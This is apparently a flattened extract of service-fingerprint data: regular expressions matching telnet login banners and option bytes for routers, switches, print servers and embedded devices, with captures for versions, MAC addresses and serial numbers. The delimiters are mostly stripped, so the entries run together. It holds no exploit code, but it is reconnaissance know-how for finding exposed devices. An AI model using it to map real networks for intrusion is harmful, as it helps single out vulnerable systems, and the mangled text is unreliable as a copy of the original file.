Systems Inc\.\x1b\[13;30HUser Name\x1b\[14;30HPassword\x1b\[23;10HMAC Address:\x1b\[8;29H([-.\w]+) Console Program\x1b\[13;41H +\xff\xfa\x18\x01\xff\xf0\xff\xfb\x01\xff\xfb\x03Ambit Cable Router\r\n\r\nLogin: +\n\rVina Technologies (.*) \((\d[-.\w]+ build \d+)\) +\xff\xfd\x03\xff\xfb\x03\xff\xfb\x01\x1b\[0m\x1b\[1;1H\x1b\[2J\rD\r \n\r (DES-.*) Command Line Interface\n\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfc\x1f\n\r\n\rUser Access Verification\n\r\n\r\n\r\n\r\n\rShell version (\d\S+).*Maipu Communication Technology Co\. +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\x1b.*Intel Corporation, ([-+. \w()]+) +\r\nFlowPoint/(.*) Ready\r\n.*\xff\xfb\x01\xff\xfb +Tenor Multipath Switch CDR Server\r\nConnected from IpAddr/Port# [\d.]+/\d+ to Port# \d+\r\nPassword: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\x0d\x0a\x0d\x0aCisco\x20Systems.*Console/Telnet Access of the ([-. \w]+) for Configuration Purposes +\xff\xfb\x01\n\r\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08 \x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08 +\r\n\r\nUser Access Verification\r\nPassword:\xff\xfb\x01 +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01.*\r\nUser Access Verification\r\n\r\nPassword: +\xff\xfb\x01\r\r\nUser Access Verification\r\r\n\r\r\nUsername: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\r\n\r\nCisco Systems Console\r\n +\xff\xfd\x18 +\xff\xfd\x18\xff\xfd\x1f\xff\xfd#\xff\xfd'\xff\xfd\ +\xff\xfb\x01\n\rUser Name : +\xff\xfd\ +\xff\xfb\x01\xff\xfb\x03\xff\xfe\x01\n\rlogin: +\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\n\r\nUsername: +\xff\xfd\x18\xff\xfd \xff\xfd#\xff\xfd'\xff\xfd\| p|Openwall GNU/*/Linux telnetd +\xff\xfc\x01\r\nHP JetDirect\r\n\r\nPlease type \"\?\" for HELP, or \"/\" for current settings\r\n> +\xff\xfb\x01\xff\xfb\x03\r\nAXIS (\S+) TELNET +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03.*?FORE\x20Systems,\x20FORE\x20ES-2810.*?Version (\d[\d\.-]+) +\xff\xfb\x03\xff\xfb\x01.*ForeRunner ES-3810.*Enter Username: +\xff\xfb\x01\r\nCopyright \(C\) 1999 by Extreme Networks\r\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03.*?ES-1000\x20Fast\x20Ethernet\x20Switch\x20Console +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05Welcome to ([-\w_]+) Debug Terminal - \d*\n\r\n\r\n\rlogin: +\x1b\[0m\x1b\[2J\x1b\[01;28HCONEXANT SYSTEMS, INC\.\x1b\[02;19H ACCESS RUNNER ADSL CONSOLE PORT\x1b\[24;01H>>>\x1b\[24;01HLOGON PASSWORD>\x1b\[02;53H3\.\d+\x1b\[24;17H\x1b\[24;17H\x1b\[24;17H\x1b\[24;17H +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\r\nWelcome on (.*)\r\n\r\n\r\nUsername: +\xff\xfb\x01\xff\xfd\x18\nTelnet Service on the PrintServer\n\n\rPassword: | p|Hawking/TRENDnet Print Server telnetd +\xff\xfb\x01\xff\xfb\x03\r\n\r\n Welcome to OpenVMS \(TM\) Alpha Operating System, Version V([\d.]+) \r\n\r\n\rUsername: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\xff\xfd \xff\xfd!\x07\r\n\r\n Welcome to OpenVMS \(TM\) Alpha Operating System, Version V([-\w_.]+) \r\n\r\n\rUsername: +\xff\xfd\(| p|IBM OS/390 or SNA telnetd +\xff\xfb\r\nRemotelyAnywhere Telnet Server v([\d.]+)\r\n.*\r\n\r\n([-\w_. ]+) login\r\nuser name: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x1f\xff\xfd\x18([^\r\n]+)\r\nRemotelyAnywhere Telnet Server ([\d.]+)\r\n.*\r\n\r\n([-\w_. ]+) login\r\nuser name: +\r\nVxWorks login: \xff\xfb\x01 +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\nSelect Access Level\r\n===================\r\n1 - Read-Only\r\n2 - Installer\r\n3 - Administrator\r\n13008 >>> +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nExterior router [-\w_.]+\r\nType: Cisco 2651\r\nModule: E3/T3 interface\r\n\r\n +\xff\xfe\x01\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x18Georgia SoftWorks Telnet Server for Windows NT/2000/XP/2003/Vista Ver\. ([-\w_.]+)\n\r +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\r\n\r\nCisco Systems, Inc\. Console\r\n\r\n\r\n\r\r\n\r\nUsername: +\xff\xfb\x01\xff\xfb\x03\r\n\r\n\[ORiNOCO-AP-(\d+)[-\d]*\]> Please enter password: +\xff\xfb\xfd\xff\xfb\x01\n\r\n\rFabric OS \(tm\) Release v([\w.]+)\n\r\n\r +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nLantronix MSS100 Version V([\d.]+)/\d+\(\d+\)\n\r\nType HELP at the 'Local_2> ' prompt for assistance\.\n\r\n\r\n\nUsername> +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\0\r\0\r\n\x07# \0 +\xff\xfb\x01OPTIBASE MGW5100 COMMAND LINE INTERFACE\r\n +PC Telnetd ([\d.]+)\r\n\r\nlogin: +rsconfig: port rose not active\n\xff\xfd\"\r\nLinuxNode v([\d.]+) \(([-\w_.]+)\)\r\n\r\nlogin: +\xff\xfd\"\r\nLinuxNode v([\d.]+) \(([-\w_.]+)\)\r\n\r\nlogin: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) Built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n# +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) Built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n/bin # +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\nermittle die aktuelle TTY\r\ntty is \"/dev/pts/0\"\r\nConsole Ausgaben auf dieses Terminal umgelenkt\r\n# +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \(2006\.02\.15-21:18\+0000\) Built-in shell \(msh\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n# +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nRouter> +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nAmiNET\d+ login: +\xff\xfb\x03\xff\xfb\x01\r\n\r\n\x07HP (\w+) Ethernet SNMP Module\r\n ROM B\.([\d.]+)\r\n EEPROM A\.([\d.]+)\r\n HW B\.([\d.]+)\r\n\r\nEnter password: +USR5450 Telnet server v([\d.]+)\n\r\nPassword : +\xff\xfd\x03\xff\xfb\x03\xff\xfd\x01\xff\xfb\x01\d\d-\w+-\d+ \d\d:\d\d:\d\d %MSCM-I-NEWTERM: New TELNET connection from (?:[\d.]+)\r\r\nPassword: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\0\n\nLantronix ETS16 Version V([\d.]+)/\d+\(\d+\)\n\r\0\nType HELP at the 'BRTR-ETS16>' prompt for assistance\.\n\r\0\nUsername> +\r\nWelcome to slush\. \(Version ([\d.]+)\)\r\n\r\n\r\n\xff\xfb\x01\xff\xfb\x03([-\w_. ]+) login: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0m\x1b\[2J\x1b\[0m\x1b\[2J\x1b\[2;66H\x1b\[1m\x1b\[21;1H\x1b\[0m-+\x1b\[22;2H\x1b\[0mFunction:\x1b\[23;2H\x1b\[0mMessage:\x1b\[24;2H\x1b\[7mCTRL\+R = Refresh +\x1b\[8;12H\x1b\[0mIBM BladeCenter 4-Port Gb Ethernet Switch Module Console +\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0;1H\x1b\[J\x1b\[1;1H\x1b\[0;1H\x1b\[J\x1b\[1;1H\x1b\[0m =+\r\n AT-8326GB Management System Version ([\d.]+) \r\n Remote - Telnet\r\n +\r\nEfficient 5851 SDSL \[ATM\] Router \(5851-\d+\) v([-\d.]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Login: +NPC Telnet permit one connection\.\r\n But One connection\(\) already keep alive\.\r\nGood Bye !! \r\n +\xff\xfb\x01\r\nWelcome to NetLinx v([\d.]+) Copyright AMX Corp\. \d+-\d+\r\n> +\r\nSiemens \d+ T1E1 \[COMBO\] Router \(([-\d]+)\) v([\d.]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Username: +\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[4;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HCopyright \(C\) 1991-1994 Hewlett-Packard Co\. All Rights Reserved\. +\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfb\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05\r\nCLI access not allowed until the SCC is active\.\r\n\r\n +\xff\xfb\x01\n?\r\n\r?VxWorks login: +\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\nVxWorks login: +\xff\xfb\x01\r\n\rPassword: | p|ZyXEL Prestige/Efficient Speedstream adsl router telnetd +\xff\xfb\x03\xff\xfb\x01password: +\r\n\xff\xfb\x01Enter password: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\w+ login: +\xff\xfb\x01\xff\xfb\x03\r\n\(\w+\) \r\nUser: +login: \xff\xfb\x01\xff\xfb\x03| p|USRobotics/Sagem router telnetd +\xff\xfb\x01\xff\xfb\x03\xff\xfb\0\xff\xfd\0login: +220 FTP server \(ver 1\.0\) ready\.\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on dslmodem login: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x1f\xff\xfd\x18 +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nlogin: +\r\nSystem unavailable\. Please try later\.\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n(FVS\w+) login: +\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03Login Name: +\xff\xfb\x01\xff\xfe\"\r\n\* +\xff\xfb\x03\xff\xfb\x01\r\n Disconnecting\.\.\.\r\n\n +\xff\xfb\x01\xff\xfb\x03\x1b\[2J\x1b\[0;0H\x1b\[K\x1b\[7mTelnet configuration RELEASE ([\d.]+)\x1b +Telnet server disabled\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfb\x01\xff\xfb\x03\r\r\n([\w._-]+) login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfb\x01\xff\xfb\x03([\w._-]+) login: +\r\n.*Based\(loosely\) on CircleMUD ([\d.]+) +\r\n.*Based on CircleMUD ([\w._-]+),\r\n +\x1b\[0;37;40m\x1b\[2J\x1b\[0;37;40m\x1b\[1m\x1b\[15;22HAT-(\w+), version ([\d.]+)\x1b +\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0;0H\x1b\[0J\x1b\[0;0H\x1b\[0J\x1b\[1;28HAT-([-\w_.]+) Login Menu\x1b\[5;18HAT-[-\w_.]+ Local Management System Version ([\d.]+) \x1b +\xff\xfd\x03\xff\xfb\x01\x1b\[2J\x1b\[1;1H\x1b\[0m\x1b\[\?3l\x1b\(0\x1b\[2;40H\x1b\(B\x1b\(0\x1b\[2;28H\x1b\(BCSX([-\w_.]+) Local Management\x1b\[0m\x1b\(0\x1b\[5;24H\x1b\(BCABLETRON Systems, Incorporated\x1b +\xff\xfb\x01\n\rno data rcvd for version string\n\rrecv version id unsuccessful\n\rSSH Session task 0x\w+: Version Exchange Failed\n\r +\r\nSorry, this system is engaged\.\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on \(none\) login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on ([-\w_.]+) login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \( +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\nBusyBox v(.*) Built-in shell \(ash\)\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\(none\) login: +\xff\xfb\x01Hummingbird Communications Ltd\., Windows NT, Telnetd Version ([\d.]+) \(([-\w_.]+)\)\r\n\r\n login: +\xff\xfb\x01\xff\xfb\x03\r\nUser Access Verification\r\n\r\nPlease Enter Login Name: +\xff\xfb\x01\xff\xfb\x03\r\nUser Access Verification\r\n\r\nPlease Enter Password: +\xff\xfb\x01\xff\xfb\x03BR-telnet@FI_Core> +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\x1b\[\?3l\x1b\[2JPlease enter your user name and password!! \r\n\r\nLogin: +\xff\xfb\x01\r\nD-Link Access Point login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03.*\r\n([-\w_.]+) login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Login failed\.\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\nPON 262194 PAAMCO (TA \w+) Gen3\r\n\n\n\ruser: +\xff\xfd\x03\xff\xfb\x03\xff\xfd\x01\xff\xfb\x01\r\n\r\r\nUser Name: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r +\*+\n\r +Welcome to ([-\w_.]+)\n\r +\*+\n\r\n\rD-Link Corp\., Inc\. Software Release ([-\w_.)(/]+)\n\rCopyright \(c\) \d+-\d+ by D-Link Corp\., Inc\.\n\r\n\rlogin: +\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\nUsing telnet exposes your password\. Using ssh is a safer choice\.\r\n\r\nUsername: +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01\r\n\r\nPIX passwd: +\xff\xfb\x01\r\n#-+\r\n# Tasman Networks Inc\. Telnet Login\r\n# +\xff\xfd\x03\xff\xfb\x01\r\n\r\n\t\tWelcome to P333R\r\n\t\tSW version ([\d.]+)\r\n\r\n\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPLi dm7000 Helenite \d+ \(based on [-\w_.]+\)\r\n\rwelcome on your dreambox! - Kernel ([-\w_.]+) +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r[ *\r\n]*Welcome on your dreambox! - Kernel (\d[\w.]+) +\xff\xfe\"\xff\xfb\x01 \x1b\[H\x1b\[J\x1b\[3;1HCB-1000 S/N: (\d+)\x1b\[3;56HSymbol Technologies, Inc\.\x1b\[4;1HVersion ([-\w_.]+)\x1b\[4;44HEthernet HW address ([\w:]+)\x1b\[21;1H +\x1b\[\?25l\xff\xfb\x01\x1b\[2J\x1b\[0m\x1b\[1;1H\x1b\[2;1H\x1b\[3;1H\x1b\[4;1H ### ### ########### ########## ############# ########### ###\x1b\[5;1H #### ### ############# ############ ############# ########### ###\x1b\[6;1H[ #]{70}\x1b\[7;1H[ #]{70}\x1b\[8;1H[ #]{70}\x1b\[9;1H[ #]{70}\x1b\[10;1H[ #]{70}\x1b\[11;1H[ #]{70}\x1b\[12;1H[ #]{78}\x1b\[13;1H[ #]{78}\x1b\[14;1H\x1b\[15;1H\x1b\[16;1HEnter Ctrl-Y to begin\.\x1b\[18;3H\*{35} +\xff\xfb\x01\x1b\[2J\x1b\[0m\x1b\[1;1H \*\*\*\*\* \*\*\* \* \* \*\*\*\*\* \*\*\*\*\*\*\*\*\* \*\*\* +\xff\xfb\x03\xff\xfb\x01\r\n\r\n\*+\r\n\* Welcome to D-Link Wireless Print Server \*\r\n\* +Telnet Console +\*\r\n\*+\r\n\r\nServer Name : ([\w._-]+)\0+\r\nServer Model : ([\w._+-]+)\0+\r\nF/W Version : ([\w._-]+)\0.\0+\r\nMAC Address : ([\w ]+) +\xff\xfb\x01\xff\xfb\x03\r\n\r\n\x1b\[H\x1b\[JWelcome at ActiveFax Server\.\r\n\r\n +\xff\xfb\x01\xff\xfb\x03RemoteX Telnet Server V([\d.]+)\n\r\n\rc:\\> +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r +\*+\n\r +Welcome to ZXDSL 831\n\r +\*+\n\r\n\rZTE Corporation, Software Release VIK-([-\w_.]+)\n\r +\*{60}\r\n\r\nThis session allows you to set the TCPIP parameters for your\r\nDell Laser Printer Printer Dell (\w+) MFP Ethernet internal network device, with a hardware\r\naddress of ([0-9A-F:]{17}) \(MSB, Canonical\)\.\r\nIt's an ethernet card\.\r\nNetwork Firmware Version is V([\w._-]+)\(\w+ MFP\) ([\d-]+)\.\r\nSystem Up Time is ([^\r\n.]+)\.\r\n\r\n +\xff\xfb\"\xff\xfb\x03\xff\xfb\x01\xff\xfb\0\xff\xfd\0\n\r\nWelcome to the PDP-10 simulator\r\n\n +\xff\xfb\x01\(Enable\) Password\? +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\r\nCGX3224 Switch Manager Console\. Version: CGX([\d.]+) Bld (\d+),.*\r\n\r\nPassword: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0m\x1b\[2J\x1b\[01;00H\r\n\r\0\r\n\r\0[ \t]+\r\n\r\0\r\n\r\0\r\0VersaXpress HPNA Routing Concentrator\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nSportster Pro ([\d.]+) Image Sagem D-BOX2 - Kernel ([-\w_.]+) +\xff\xfb\x01\xff\xfb\x03\r\0\n\*\*\* Lantronix Universal Device Server \*\*\*\r\0\nSerial Number (\d+) MAC address ([\w:]+)\n\r\0Software version 0*([\d.]+) \((\d+)\)\r\0\n\r\0\nPress Enter to go into Setup Mode \r\0\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Fritz!Box web password: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nFritz!Box web password: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nDD-WRT v([-\w_+. ]+) Date: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nDD-WRT v([^\r\n]+)\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03DD-WRT (v\d+)[^\r\n]*\r\nRelease: ([^\r\n]+)\r\n\xff\r\ngateway login: +\xff\xfd\x18\xff\xfd \xff\xfd#\xff\xfd\x1f\xff\xfd'\xff\xfd\ +\xff\xfb\x03\xff\xfb\x01\r\n\r\nU\.S\. Robotics\r\nTotal Control \(tm\) NETServer 8/16\r\n\r\nlogin: | p|USRobotics TotalControl NetServer 8/16 telnetd +\xff\xfb\x01\r\n\r\n\*\*\* ADTRAN TSU ESP \*\*\*\r\n\r\n ENTER PASSWORD -> \xff\xfd\x03\xff\xfb\x03 +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nLantronix (SCS\d+) Version V([\d/().]+)\n\r\nType HELP +\xff\xfb\x03\xff\xfb\x01\r\n\r\nPassword : +\xff\xfb\x01\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\*+\r\n\* Copyright\(c\) 1998-2006 Huawei Technologies Co\., Ltd\. All rights reserved\. \*\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\n\r\nWelcome to X2301 version V\.([-\w_+. ()]+) IPSec from [\d/]+ [\d:]+\r\nsystemname is ([-\w_.]+), +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r *\**\n\r *Welcome to Viking II\. \n\r *\**\n\r\n\rGlobespanVirata Inc\., Software Release VIK-([-\w_.]+)\n\r +\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[1;1H\x1b\[J\x1b\[22;0H>\x1b\[1K\x1b\[999D\r\0login: +\x1b\[2J\x1b\[1;1fATOS Telnet Server\r\n\r\nCTRL\+d to exit\n\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03Init Command Line Interface\.\. \r\nBoot Version: [\d.]+\r\nBoot Date: [\d :/]+\r\nATOS Version: ([\d.]+) \([^)]+\)\r\nATOS Date: [\d :/]+\r\nHardware: \w+\r\nProduct Code : \d+\r\nSerial Number : (\d+)\r\nLAN0 MAC Address : ([A-F0-9:]+)\r\nADSL Modem SW version: [\w._-]+ *\r\nADSL Modem API version: \d+\r\nADSL Driver version: [\w._-]+\r\n([\w._-]+) release: ([\w._-]+)+\r\nHW encryption not supported\r\nVinetic fw version : [\w._-]+\r\n\r\nUser name : +\xff\xfb\x01\xff\xfe\x01\n\r\n\r\n\r\n\n\n\n\r\t=+\n\r\t +Samsung SWL-6100AP Configuration\n\r\t +\xff\xfb\x01\xff\xfb\x03\r\0\nMAC address (\w+)\n\r\0Software version ([\w._-]+ \(\d+\)) XPTEXE\r\0\n\n\r\0Press Enter to go into Setup Mode \n\r\0 +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03USR ADSL Gateway\r\nLogin: +\xff\xfb\x03\xff\xfb\x01\r\nService Processor login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03ADSL2\+ Wireless Router (\w+) \r\nSoftware Version: ([\w.]+)\r\nLogin name: +\xff\xfb\x01Symbol Access Point User/Admin password: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x18\xff\xfd\x1f\xff\xfd \xff\xfd!\xff\xfe\"\xff\xfc\"Username Access Verification\r\n\r\nLogin : +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05Welcome to Telnet Server ([\w._-]+)\r\n\x1b\[0m\x1b\[2J\x1b\[05;28H(SM\w+) Managed Switch\x1b\[07;22H\x7fTallahasseeAdmin-Block\x1b\[15;30Husername:\x1b\[17;30Hpassword:\x1b\[15;39H +\r\n\r\nPassword required, but none set\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1fWelcome to your TiVo\r\n\r\n=\[tivo:root\]-# +\xff\xfa\x18\x01\xff\xf0\xff\xfb\x01\xff\xfb\x03AMBIT Cable Modem\r\n\r\nlogin: +refused in\.telnetd from [-\w_.]+ logged\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Access DENIED\.\r\n +\xff\xfb\x01\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b\[2K\x1b\[4;1H\x1b\[2K\x1b\[5;1H\x1b\[2K\x1b\[6;.*Business Policy Switch 2000 +BeanShell ([-\w_.]+) - by Pat Niemeyer \(pat@pat\.net\)\nbsh % +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x1f\r\n\(Aruba800\) \r\nUser: +\xff\xfb\x01\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b\[2K\x1b\[4;1H\x1b\[2K\x1b\[5;1H\x1b\[2K\x1b\[6;1H\x1b.*BayStack 420 +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03SHARP (MX-\w+) Ver ([-\w_.]+) TELNET server\. +\xff\xfb\x01\xff\xfb\x03Welcome to (DCS-\w+) telnet daemon\r\n\r\nPassword: +\xff\xfb\x01\r\nVoIP Phone V([-\w_.]+) settings\r\nPassword: +\xff\xfb\x01\r\nAIRAYA login: +\xff.\x01\0?\xff\xfd.*Welcome to ViewStation.*Password: +AD6680 Gateway Software\r\n[-\w_]+ \(MAC ([\w:]+)\)\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nHP ProLiant BL p-Class C-GbE2 Interconnect Switch A\.\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03Netgear DM111 ADSL2\+ Modem \r\nSoftware Version: ([-\w_.]+)\r\nLogin name: +\xff\xfb\x03\xff\xfb\x01\r\n\r\n\*+\r\n\* Welcome to Print Server \*\r\n\* +Telnet Console +\*\r\n\*+\r\n\r\nServer Name : ([\w._-]+)\0\0\0\0\0\0\r\nServer Model : 2U1P Print Server\0+\r\nF/W Version : ([\w._-]+).*\r\nMAC Address : ([\w ]+) +\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01\r\n\r\nMMC Technology Telnet\r\nMW-3000AP \w+\( Combo ([-\w_.]+) \)\r\n\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r.*\n\r\n\rSoftware Release R([-\w_.]+)\([^)]+\)\n\rCopyright \(c\) 2001-2003 by D-Link, Inc\.\n\r\n\rlogin: +\xff\xfb\x03\xff\xfb\x01\r\nWelcome to the WhatRoute TELNET Server\.\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nCNU-550pro login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03picotux login: +\xff\xfb\x03\xff\xfd\x18\xff\xfb\x01\xff\xfd\x1f\xff\xfd!\r\nCadant C3 CMTS\r\n +\r\n\(c\) Copyright 2005, Extron Electronics, IPL T S2, V([\d.]+), +\xff\xfb\x01\xff\xfb\x03\r\n.*HM410dp ADSL2\+ Router\r\n\r\nLogin: +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03NS-30G Ver ([-\w_.]+) TELNET server\.\r\0\nCopyright \(c\) \d+ KYOCERA +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\n\r\nWelcome to X4100 version V\.([-\w_.]+) Rev\. (\d+) \(Patch (\d+)\) from [\d/]+ [\d:]+\r\nsystemname is ([-\w_.]+), +\xff\xfe\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03login: +\xff\xfb\x03\xff\xfb\x01\r\nZyXEL Corporation Embedded Telnet Server \(c\) 2000-2003\r\n +\xff\xfb\x01\xff\xfb\x03\*\*\* Lantronix UDS1100 Device Server \*\*\*\r\0\nMAC address (\w+)\n\r\0Software version V([\w._-]+) \((\d+)\) \r\0\nPassword : +\xff\xfb\x01\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\*+\r\n\* Copyright\(c\) 2004-2006 3Com Corp\. and its licensors\. +\xff\xfd\x03\xff\xfb\x01\r\n\r\nProduct type: Avaya (\w+) Media Gateway Release ([\w._-]+)\r\n\r\n\r\n\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPLi dm500 Jade \d+ \(based on ([\w._-]+)\)\r\n\rwelcome on your dreambox! - Kernel ([\w._-]+) \([\d:]+\)\.\r\n\rdm500 login: +\r\nSorry, this system is engaged by a rlogin session\.\r\nHost IP address: ([\d.]+)\.\nLogin name: ([\w._-]+)\.\n +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01.*\r\n\r\nUser Access Verification\r\n\r\nUsername: +Connected\r\nUse log command to LOGON\r\n +\xff\xfb\x01\xff\xfb\x03Grandstream ([\w-]+) Command Shell\r\nPassword: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Grandstream ([\w-]+) V([\w.]+) Command Shell +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03AH4021\r\nLogin: +\xff\xfb\x01\xff\xfb\x03\n\r\0SNTP Version 